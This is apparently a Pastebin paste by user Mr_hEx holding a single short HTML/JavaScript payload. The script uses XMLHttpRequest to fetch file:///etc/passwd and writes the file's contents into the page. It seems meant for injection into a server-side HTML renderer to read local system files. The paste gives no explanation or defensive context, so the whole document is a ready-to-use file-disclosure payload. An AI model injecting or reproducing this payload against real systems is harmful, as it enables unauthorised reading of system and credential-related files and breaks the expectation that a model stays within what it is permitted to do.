Advertisement
Mr_hEx

Untitled

Feb 29th, 2020
320
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.15 KB | None | 0 0
  1. <script> x=new XMLHttpRequest; x.onload=function(){ document.write("
  2. "+this.responseText+"
  3. ") }; x.open("GET","file:///etc/passwd"); x.send(); </script>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement